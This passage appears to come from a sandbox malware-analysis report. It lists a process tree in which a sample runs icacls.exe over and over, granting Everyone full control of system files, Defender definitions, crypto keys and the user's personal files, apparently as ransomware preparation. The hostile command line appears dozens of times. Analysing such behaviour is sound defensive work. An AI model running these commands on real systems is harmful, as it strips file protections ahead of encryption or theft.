  "icacls.exe" C:\Users\All Users\Package Cache\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}\state.rsm /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:2788
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Package Cache\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\packages\vcRuntimeMinimum_amd64\cab1.cab /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:2756
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Package Cache\{CB0836EC-B072-368D-82B2-D3470BF95707}v12.0.40660\packages\vcRuntimeMinimum_amd64\cab1.cab /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:2816
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Package Cache\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\state.rsm /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:2848
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Package Cache\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}v12.0.40660\packages\vcRuntimeAdditional_amd64\cab1.cab /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:2864
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Package Cache\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\packages\vcRuntimeAdditional_amd64\cab1.cab /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:2908
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Package Cache\{12578975-C765-4BDF-8DDC-3284BC0E855F}v14.21.27702\packages\vcRuntimeAdditional_amd64\cab1.cab /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:2892
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft Help\nslist.hxl /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:2936
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Support\MPLog-07132009-221054.log /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:2972
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Definition Updates\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\mpasbase.vdm /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:3008
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Definition Updates\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\mpasdlta.vdm /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:3064
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\WER\ReportQueue\NonCritical_x64_15ac16619585aa27282df5e4c6acd0916524a313_cab_07d85d1c\DMI5D0D.tmp.log.xml /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:2460
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 01.wma /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:3036
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 02.wma /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:3004
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 03.wma /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:2076
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 04.wma /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:2072
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 05.wma /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1380
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 06.wma /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:928
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 07.wma /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:964
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 08.wma /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:556
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 09.wma /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:972
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 10.wma /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:368
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\Caches\cversions.2.db /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1044
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\Caches\{4E4260A4-7E39-442E-BC22-7FF751D1C161}.2.ver0x0000000000000002.db /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:2104
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\Caches\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000014.db /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:2120
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\Caches\{7A0BA986-7FBF-406D-B21F-2604FA30AD2A}.2.ver0x0000000000000002.db /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:2144
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\Caches\{B80414EE-2C42-477E-89F0-057992770FA7}.2.ver0x0000000000000001.db /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:2168
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\Caches\{CDEEB37A-A1F0-4C85-A9E0-3FBEB2F4D504}.2.ver0x0000000000000001.db /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:2204
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\Caches\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:2268
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\User Account Pictures\Admin.dat /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:2364
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\MSS.chk /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:2324
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\MSS.log /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:2212
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\MSSres00001.jrs /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:1124
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\MSSres00002.jrs /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:2208
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Windows.edb /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:2360
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\SecStore\CiST0000.000 /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:288
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\SecStore\CiST0000.001 /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:1016
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\SecStore\CiST0000.002 /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:564
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\PropMap\CiPT0000.000 /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:1548
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\PropMap\CiPT0000.001 /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:1684
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\PropMap\CiPT0000.002 /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:1100
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\CiAB0001.000 /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:392
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\CiAB0001.001 /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:760
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\CiAB0001.002 /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:1188
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\CiAB0002.000 /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1352
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\CiAB0002.001 /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:2380
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\CiAB0002.002 /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:2392
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\CiAD0001.000 /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:2396
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\CiAD0001.001 /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:876
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\CiAD0001.002 /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:1164
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\INDEX.000 /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:1772
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\INDEX.001 /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:2484
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\INDEX.002 /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:2524
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\GatherLogs\SystemIndex\SystemIndex.1.Crwl /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:2528
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\GatherLogs\SystemIndex\SystemIndex.1.gthr /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:2536
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\RAC\StateData\RacMetaData.dat /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:2584
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\OfficeSoftwareProtectionPlatform\tokens.dat /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:2572
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\OfficeSoftwareProtectionPlatform\Cache\cache.dat /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:2612
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\OFFICE\AssetLibrary.ico /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:2668
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\OFFICE\DocumentRepository.ico /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:2596
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\OFFICE\MySharePoints.ico /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:2636
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\OFFICE\MySite.ico /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:2708
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\OFFICE\SharePointPortalSite.ico /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:2676
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\OFFICE\SharePointTeamSite.ico /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:2728
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Crypto\RSA\S-1-5-18\6d14e4b1d8ca773bab785d1be032546e_17ebba21-ade9-4848-b865-5b9359ee593d /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:916
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Adobe\Updater6\AdobeESDGlobalApps.xml /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:2764
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Adobe\Acrobat\9.0\Replicate\Security\directories.acrodata /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:2788
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\deployment.properties /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:2828
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Searches\Everywhere.search-ms /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:2812
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Searches\Indexed Locations.search-ms /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:2872
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Pictures\BackupMove.wmf /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:2864
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Pictures\CompareRestart.dwg /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:2908
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Pictures\ConnectSuspend.jpg /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1272
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Pictures\ConvertFromExport.raw /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:2984
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Pictures\DebugPing.eps /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:3028
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Pictures\DenyDisconnect.wmf /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:2548
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Pictures\DenyRead.svg /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:2460
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Pictures\EditGrant.dxf /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:3040
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Pictures\ExitHide.emz /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:2996
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Pictures\FindClear.svgz /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1320
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Pictures\FormatHide.raw /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:976
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Pictures\MergeShow.tif /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:924
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Pictures\PingUnprotect.jpeg /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:964
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Pictures\RegisterExpand.gif /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:556
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Pictures\RevokeAdd.wmf /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:1236
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Pictures\RevokeClose.svgz /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:368
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Pictures\RevokeNew.jpg /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:2184
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Pictures\SendUse.eps /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:2132
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Pictures\SplitInstall.crw /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:2368
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Pictures\StartInitialize.dib /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:2332
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Pictures\SubmitDisable.ico /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:2104
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Pictures\TraceSave.emz /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:2356
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Pictures\Wallpaper.jpg /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:2328
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Pictures\WriteRestore.gif /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:2212
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Music\BlockOptimize.html /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:2344
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Music\ConnectRestore.ttc /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:1304
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Music\ConvertFromDisable.vstm /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:1496
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Music\ConvertToSync.emf /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:1564
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Music\OptimizeShow.nfo /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1632
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Music\ProtectRead.odt /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:476
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Music\PushDeny.mpa /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:2020
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Music\RepairDebug.ico /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:2288
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Music\RequestCompress.pdf /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:2296
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Music\WriteDisable.mp3 /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:2036
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Favorites\Windows Live\Get Windows Live.url /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:324
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Favorites\Windows Live\Windows Live Gallery.url /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:2400
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Favorites\Windows Live\Windows Live Mail.url /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:2440
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Favorites\Windows Live\Windows Live Spaces.url /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:2408
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Favorites\MSN Websites\MSN Autos.url /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:2540
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Favorites\MSN Websites\MSN Entertainment.url /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:2512
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Favorites\MSN Websites\MSN Money.url /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:2516
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Favorites\MSN Websites\MSN Sports.url /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:2564
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Favorites\MSN Websites\MSN.url /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:2560
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Favorites\MSN Websites\MSNBC News.url /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:2552
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Favorites\Microsoft Websites\IE Add-on site.url /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:760
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Favorites\Microsoft Websites\IE site on Microsoft.com.url /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:2572
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Favorites\Microsoft Websites\Microsoft At Home.url /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:564
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Favorites\Microsoft Websites\Microsoft At Work.url /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:2612
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Favorites\Microsoft Websites\Microsoft Store.url /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:2664
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Favorites\Links for United States\GobiernoUSA.gov.url /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:2640
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Favorites\Links for United States\USA.gov.url /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:2692
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Favorites\Links\Suggested Sites.url /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:2684
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Favorites\Links\Web Slice Gallery.url /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:2736
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Downloads\AssertUnprotect.xlt /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:2088
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Downloads\BackupDeny.3gp /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:2784
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Downloads\BackupRevoke.vbs /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:2772
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Downloads\ConnectShow.vstm /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:2788
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Downloads\DismountUnblock.aifc /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:2828
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Downloads\EnterNew.vdw /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:2812
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Downloads\ExitRestore.xlsb /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:2900
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Downloads\ExitRevoke.emf /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:2880
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Downloads\ExportSuspend.mp2 /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:2968
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Downloads\InvokeCopy.iso /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:3052
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Downloads\MountTest.vdw /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:2916
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Downloads\MovePush.mp2 /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:2728
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Downloads\OpenRepair.mpg /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:2548
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Downloads\OutCompare.3g2 /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:780
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Downloads\PopUninstall.mpg /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:2076
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Downloads\RemoveSplit.tif /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:1348
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Downloads\RepairRequest.xltx /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:2096
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Downloads\ResetDebug.xhtml /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:952
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Downloads\ResetSplit.ps1 /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:2460
- C:\Windows\SysWOW64\icacls.exe
